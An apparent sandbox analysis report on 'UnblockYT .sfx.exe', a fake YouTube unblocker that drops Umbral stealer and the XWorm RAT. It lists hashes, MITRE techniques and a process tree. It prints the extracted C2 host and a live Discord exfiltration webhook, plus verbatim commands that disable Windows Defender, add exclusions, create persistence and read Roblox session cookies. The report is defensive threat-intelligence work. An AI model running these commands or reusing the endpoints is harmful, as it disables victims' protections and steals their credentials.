umbral | b64d7ddeb7362ca3377c16143d699256c78a4c6340d4d79bf0f092d538823bd0

Analysis

max time kernel
300s
max time network
300s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
05-08-2024 08:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

UnblockYT .sfx.exe
Size

2.0MB
MD5

d916c09287b75c30e207a4613a75e3b7
SHA1

dfb8fb428e5b2cef3163b1de09bf88a71c5e84a5
SHA256

b64d7ddeb7362ca3377c16143d699256c78a4c6340d4d79bf0f092d538823bd0
SHA512

3beab1703dc0d0f931baf2cb7822b5a412867a3194184fca99f6be2c386048524c3e9e2e5b957f1f8fe12a0af4190fba41592fae68ce1623c81a65069e1ac8c4
SSDEEP

49152:1Djlabwz9uJm2SnlA3tc4F7VP0q8bJQ555Yw6hzAdxopxRL:ZqwEKeTv0q8bG55v3q5

Score

10^/10

umbral xworm credential_access discovery execution persistence rat spyware stealer trojan

Malware Config

Extracted

Family

xworm

connection-arizona.gl.at.ply.gg:65211

Attributes

Install_directory
%AppData%
install_file
svchost.exe

Extracted

Family

umbral

https://discord.com/api/webhooks/1269943614985863178/Snv_QcCVwSIoYNJg4xeEatpV3Q1YTnWJobZDi7PbgCWJqJTv3OWTmQttxL-3iAWsDAxu

Signatures

Detect Umbral payload 4 IoCs

resource	yara_rule
behavioral2/files/0x0008000000023478-168.dat	family_umbral
behavioral2/memory/552-175-0x000001839A7C0000-0x000001839A800000-memory.dmp	family_umbral
behavioral2/files/0x0009000000023478-315.dat	family_umbral
behavioral2/memory/3220-317-0x0000026B1D7C0000-0x0000026B1D800000-memory.dmp	family_umbral

Detect Xworm Payload 14 IoCs

resource	yara_rule
behavioral2/memory/4400-36-0x00000000006E0000-0x0000000000A92000-memory.dmp	family_xworm
behavioral2/memory/3380-155-0x00000000006F0000-0x0000000000AA2000-memory.dmp	family_xworm
behavioral2/memory/3380-156-0x00000000006F0000-0x0000000000AA2000-memory.dmp	family_xworm
behavioral2/memory/3380-160-0x00000000006F0000-0x0000000000AA2000-memory.dmp	family_xworm
behavioral2/memory/2024-266-0x00000000006F0000-0x0000000000AA2000-memory.dmp	family_xworm
behavioral2/memory/2024-269-0x00000000006F0000-0x0000000000AA2000-memory.dmp	family_xworm
behavioral2/memory/1864-276-0x00000000006F0000-0x0000000000AA2000-memory.dmp	family_xworm
behavioral2/memory/1864-277-0x00000000006F0000-0x0000000000AA2000-memory.dmp	family_xworm
behavioral2/memory/1864-280-0x00000000006F0000-0x0000000000AA2000-memory.dmp	family_xworm
behavioral2/memory/1188-287-0x00000000006F0000-0x0000000000AA2000-memory.dmp	family_xworm
behavioral2/memory/1188-288-0x00000000006F0000-0x0000000000AA2000-memory.dmp	family_xworm
behavioral2/memory/1188-291-0x00000000006F0000-0x0000000000AA2000-memory.dmp	family_xworm
behavioral2/memory/4852-299-0x00000000006F0000-0x0000000000AA2000-memory.dmp	family_xworm
behavioral2/memory/4852-302-0x00000000006F0000-0x0000000000AA2000-memory.dmp	family_xworm

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Command and Scripting Interpreter: PowerShell 1 TTPs 11 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1104	powershell.exe
5116	powershell.exe
752	powershell.exe
4064	powershell.exe
3604	powershell.exe
3288	powershell.exe
4164	powershell.exe
2396	powershell.exe
3924	powershell.exe
4412	powershell.exe
3460	powershell.exe

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	ldrynh.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	dazwnn.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	UnblockYT .sfx.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	UnblockYT .exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	YTunblock.sfx.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	YTunblock.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk	YTunblock.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk	YTunblock.exe

Executes dropped EXE 10 IoCs

pid	Process
956	UnblockYT .exe
3892	YTunblock.sfx.exe
4400	YTunblock.exe
3380	svchost.exe
552	ldrynh.exe
2024	svchost.exe
1864	svchost.exe
1188	svchost.exe
4852	svchost.exe
3220	dazwnn.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe"	YTunblock.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
42	discord.com
43	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
19	ip-api.com

Suspicious use of NtSetInformationThreadHideFromDebugger 38 IoCs

pid	Process
4400	YTunblock.exe
4400	YTunblock.exe
4400	YTunblock.exe
3380	svchost.exe
4400	YTunblock.exe
4400	YTunblock.exe
4400	YTunblock.exe
4400	YTunblock.exe
4400	YTunblock.exe
4400	YTunblock.exe
2024	svchost.exe
2024	svchost.exe
4400	YTunblock.exe
4400	YTunblock.exe
4400	YTunblock.exe
4400	YTunblock.exe
4400	YTunblock.exe
4400	YTunblock.exe
1864	svchost.exe
4400	YTunblock.exe
4400	YTunblock.exe
4400	YTunblock.exe
4400	YTunblock.exe
4400	YTunblock.exe
4400	YTunblock.exe
1188	svchost.exe
4400	YTunblock.exe
4400	YTunblock.exe
4400	YTunblock.exe
4400	YTunblock.exe
4400	YTunblock.exe
4400	YTunblock.exe
4852	svchost.exe
4852	svchost.exe
4400	YTunblock.exe
4400	YTunblock.exe
4400	YTunblock.exe
4400	YTunblock.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	YTunblock.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
3692	cmd.exe
812	PING.EXE

Delays execution with timeout.exe 10 IoCs

evasion

pid	Process
1700	timeout.exe
4792	timeout.exe
2072	timeout.exe
2328	timeout.exe
1452	timeout.exe
4808	timeout.exe
4792	timeout.exe
3812	timeout.exe
452	timeout.exe
4464	timeout.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3592	wmic.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
812	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1584	schtasks.exe

Suspicious behavior: EnumeratesProcesses 28 IoCs

pid	Process
4064	powershell.exe
4064	powershell.exe
3604	powershell.exe
3604	powershell.exe
3288	powershell.exe
3288	powershell.exe
1104	powershell.exe
1104	powershell.exe
4400	YTunblock.exe
552	ldrynh.exe
5116	powershell.exe
5116	powershell.exe
4412	powershell.exe
4412	powershell.exe
3460	powershell.exe
3460	powershell.exe
2188	powershell.exe
2188	powershell.exe
4164	powershell.exe
4164	powershell.exe
752	powershell.exe
752	powershell.exe
2396	powershell.exe
2396	powershell.exe
3924	powershell.exe
3924	powershell.exe
668	powershell.exe
668	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4400	YTunblock.exe
Token: SeDebugPrivilege	4064	powershell.exe
Token: SeDebugPrivilege	3604	powershell.exe
Token: SeDebugPrivilege	3288	powershell.exe
Token: SeDebugPrivilege	1104	powershell.exe
Token: SeDebugPrivilege	4400	YTunblock.exe
Token: SeDebugPrivilege	3380	svchost.exe
Token: SeDebugPrivilege	552	ldrynh.exe
Token: SeIncreaseQuotaPrivilege	1656	wmic.exe
Token: SeSecurityPrivilege	1656	wmic.exe
Token: SeTakeOwnershipPrivilege	1656	wmic.exe
Token: SeLoadDriverPrivilege	1656	wmic.exe
Token: SeSystemProfilePrivilege	1656	wmic.exe
Token: SeSystemtimePrivilege	1656	wmic.exe
Token: SeProfSingleProcessPrivilege	1656	wmic.exe
Token: SeIncBasePriorityPrivilege	1656	wmic.exe
Token: SeCreatePagefilePrivilege	1656	wmic.exe
Token: SeBackupPrivilege	1656	wmic.exe
Token: SeRestorePrivilege	1656	wmic.exe
Token: SeShutdownPrivilege	1656	wmic.exe
Token: SeDebugPrivilege	1656	wmic.exe
Token: SeSystemEnvironmentPrivilege	1656	wmic.exe
Token: SeRemoteShutdownPrivilege	1656	wmic.exe
Token: SeUndockPrivilege	1656	wmic.exe
Token: SeManageVolumePrivilege	1656	wmic.exe
Token: 33	1656	wmic.exe
Token: 34	1656	wmic.exe
Token: 35	1656	wmic.exe
Token: 36	1656	wmic.exe
Token: SeIncreaseQuotaPrivilege	1656	wmic.exe
Token: SeSecurityPrivilege	1656	wmic.exe
Token: SeTakeOwnershipPrivilege	1656	wmic.exe
Token: SeLoadDriverPrivilege	1656	wmic.exe
Token: SeSystemProfilePrivilege	1656	wmic.exe
Token: SeSystemtimePrivilege	1656	wmic.exe
Token: SeProfSingleProcessPrivilege	1656	wmic.exe
Token: SeIncBasePriorityPrivilege	1656	wmic.exe
Token: SeCreatePagefilePrivilege	1656	wmic.exe
Token: SeBackupPrivilege	1656	wmic.exe
Token: SeRestorePrivilege	1656	wmic.exe
Token: SeShutdownPrivilege	1656	wmic.exe
Token: SeDebugPrivilege	1656	wmic.exe
Token: SeSystemEnvironmentPrivilege	1656	wmic.exe
Token: SeRemoteShutdownPrivilege	1656	wmic.exe
Token: SeUndockPrivilege	1656	wmic.exe
Token: SeManageVolumePrivilege	1656	wmic.exe
Token: 33	1656	wmic.exe
Token: 34	1656	wmic.exe
Token: 35	1656	wmic.exe
Token: 36	1656	wmic.exe
Token: SeDebugPrivilege	5116	powershell.exe
Token: SeDebugPrivilege	4412	powershell.exe
Token: SeDebugPrivilege	3460	powershell.exe
Token: SeDebugPrivilege	2188	powershell.exe
Token: SeIncreaseQuotaPrivilege	4152	wmic.exe
Token: SeSecurityPrivilege	4152	wmic.exe
Token: SeTakeOwnershipPrivilege	4152	wmic.exe
Token: SeLoadDriverPrivilege	4152	wmic.exe
Token: SeSystemProfilePrivilege	4152	wmic.exe
Token: SeSystemtimePrivilege	4152	wmic.exe
Token: SeProfSingleProcessPrivilege	4152	wmic.exe
Token: SeIncBasePriorityPrivilege	4152	wmic.exe
Token: SeCreatePagefilePrivilege	4152	wmic.exe
Token: SeBackupPrivilege	4152	wmic.exe

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
4400	YTunblock.exe
4400	YTunblock.exe
3380	svchost.exe
2024	svchost.exe
1864	svchost.exe
1188	svchost.exe
4852	svchost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3192 wrote to memory of 956	3192	UnblockYT .sfx.exe	85
PID 3192 wrote to memory of 956	3192	UnblockYT .sfx.exe	85
PID 956 wrote to memory of 3892	956	UnblockYT .exe	87
PID 956 wrote to memory of 3892	956	UnblockYT .exe	87
PID 956 wrote to memory of 1260	956	UnblockYT .exe	88
PID 956 wrote to memory of 1260	956	UnblockYT .exe	88
PID 1260 wrote to memory of 452	1260	cmd.exe	91
PID 1260 wrote to memory of 452	1260	cmd.exe	91
PID 3892 wrote to memory of 4400	3892	YTunblock.sfx.exe	92
PID 3892 wrote to memory of 4400	3892	YTunblock.sfx.exe	92
PID 3892 wrote to memory of 4400	3892	YTunblock.sfx.exe	92
PID 1260 wrote to memory of 4792	1260	cmd.exe	95
PID 1260 wrote to memory of 4792	1260	cmd.exe	95
PID 1260 wrote to memory of 4464	1260	cmd.exe	96
PID 1260 wrote to memory of 4464	1260	cmd.exe	96
PID 4400 wrote to memory of 4064	4400	YTunblock.exe	98
PID 4400 wrote to memory of 4064	4400	YTunblock.exe	98
PID 4400 wrote to memory of 4064	4400	YTunblock.exe	98
PID 1260 wrote to memory of 2328	1260	cmd.exe	100
PID 1260 wrote to memory of 2328	1260	cmd.exe	100
PID 4400 wrote to memory of 3604	4400	YTunblock.exe	101
PID 4400 wrote to memory of 3604	4400	YTunblock.exe	101
PID 4400 wrote to memory of 3604	4400	YTunblock.exe	101
PID 1260 wrote to memory of 2072	1260	cmd.exe	103
PID 1260 wrote to memory of 2072	1260	cmd.exe	103
PID 4400 wrote to memory of 3288	4400	YTunblock.exe	104
PID 4400 wrote to memory of 3288	4400	YTunblock.exe	104
PID 4400 wrote to memory of 3288	4400	YTunblock.exe	104
PID 1260 wrote to memory of 1452	1260	cmd.exe	106
PID 1260 wrote to memory of 1452	1260	cmd.exe	106
PID 4400 wrote to memory of 1104	4400	YTunblock.exe	107
PID 4400 wrote to memory of 1104	4400	YTunblock.exe	107
PID 4400 wrote to memory of 1104	4400	YTunblock.exe	107
PID 1260 wrote to memory of 4808	1260	cmd.exe	109
PID 1260 wrote to memory of 4808	1260	cmd.exe	109
PID 4400 wrote to memory of 1584	4400	YTunblock.exe	110
PID 4400 wrote to memory of 1584	4400	YTunblock.exe	110
PID 4400 wrote to memory of 1584	4400	YTunblock.exe	110
PID 1260 wrote to memory of 4792	1260	cmd.exe	112
PID 1260 wrote to memory of 4792	1260	cmd.exe	112
PID 1260 wrote to memory of 3812	1260	cmd.exe	114
PID 1260 wrote to memory of 3812	1260	cmd.exe	114
PID 1260 wrote to memory of 1700	1260	cmd.exe	115
PID 1260 wrote to memory of 1700	1260	cmd.exe	115
PID 4400 wrote to memory of 552	4400	YTunblock.exe	118
PID 4400 wrote to memory of 552	4400	YTunblock.exe	118
PID 552 wrote to memory of 1656	552	ldrynh.exe	119
PID 552 wrote to memory of 1656	552	ldrynh.exe	119
PID 552 wrote to memory of 1448	552	ldrynh.exe	121
PID 552 wrote to memory of 1448	552	ldrynh.exe	121
PID 552 wrote to memory of 5116	552	ldrynh.exe	123
PID 552 wrote to memory of 5116	552	ldrynh.exe	123
PID 552 wrote to memory of 4412	552	ldrynh.exe	125
PID 552 wrote to memory of 4412	552	ldrynh.exe	125
PID 552 wrote to memory of 3460	552	ldrynh.exe	127
PID 552 wrote to memory of 3460	552	ldrynh.exe	127
PID 552 wrote to memory of 2188	552	ldrynh.exe	129
PID 552 wrote to memory of 2188	552	ldrynh.exe	129
PID 552 wrote to memory of 4152	552	ldrynh.exe	131
PID 552 wrote to memory of 4152	552	ldrynh.exe	131
PID 552 wrote to memory of 1264	552	ldrynh.exe	133
PID 552 wrote to memory of 1264	552	ldrynh.exe	133
PID 552 wrote to memory of 2932	552	ldrynh.exe	135
PID 552 wrote to memory of 2932	552	ldrynh.exe	135

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1448	attrib.exe
3416	attrib.exe

C:\Users\Admin\AppData\Local\Temp\UnblockYT .sfx.exe
"C:\Users\Admin\AppData\Local\Temp\UnblockYT .sfx.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3192
- C:\Users\Admin\AppData\Roaming\UnblockYT .exe
  "C:\Users\Admin\AppData\Roaming\UnblockYT .exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:956
- - C:\Users\Admin\AppData\Roaming\YTunblock.sfx.exe
    "C:\Users\Admin\AppData\Roaming\YTunblock.sfx.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:3892
  - - C:\Users\Admin\AppData\Roaming\YTunblock.exe
      "C:\Users\Admin\AppData\Roaming\YTunblock.exe"
      4⤵
      Checks computer location settings
      Drops startup file
      Executes dropped EXE
      Adds Run key to start application
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:4400
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\YTunblock.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4064
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'YTunblock.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3604
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3288
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1104
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\svchost.exe"
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:1584
    - - C:\Users\Admin\AppData\Local\Temp\ldrynh.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ldrynh.exe"
        5⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:552
      - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1656
      - C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\ldrynh.exe"
        6⤵
        Views/modifies file attributes
        
        PID:1448
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\ldrynh.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5116
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4412
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3460
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2188
      - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4152
      - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        6⤵
        
        PID:1264
      - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        6⤵
        
        PID:2932
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4164
      - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        6⤵
        Detects videocard installed
        
        PID:3592
      - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\ldrynh.exe" && pause
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:3692
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        7⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:812
    - - C:\Users\Admin\AppData\Local\Temp\dazwnn.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dazwnn.exe"
        5⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:3220
      - C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dazwnn.exe"
        6⤵
        Views/modifies file attributes
        
        PID:3416
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dazwnn.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:752
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2396
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3924
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\ .bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1260
  - - C:\Windows\system32\timeout.exe
      timeout /t 2 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:452
  - - C:\Windows\system32\timeout.exe
      timeout /t 1 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:4792
  - - C:\Windows\system32\timeout.exe
      timeout /t 3 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:4464
  - - C:\Windows\system32\timeout.exe
      timeout /t 2 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:2328
  - - C:\Windows\system32\timeout.exe
      timeout /t 2 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:2072
  - - C:\Windows\system32\timeout.exe
      timeout /t 3 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:1452
  - - C:\Windows\system32\timeout.exe
      timeout /t 3 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:4808
  - - C:\Windows\system32\timeout.exe
      timeout /t 3 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:4792
  - - C:\Windows\system32\timeout.exe
      timeout /t 3 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:3812
  - - C:\Windows\system32\timeout.exe
      timeout /t 3 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:1700

C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
1⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3380

C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
1⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2024

C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
1⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1864

C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
1⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1188

C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
1⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4852

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016
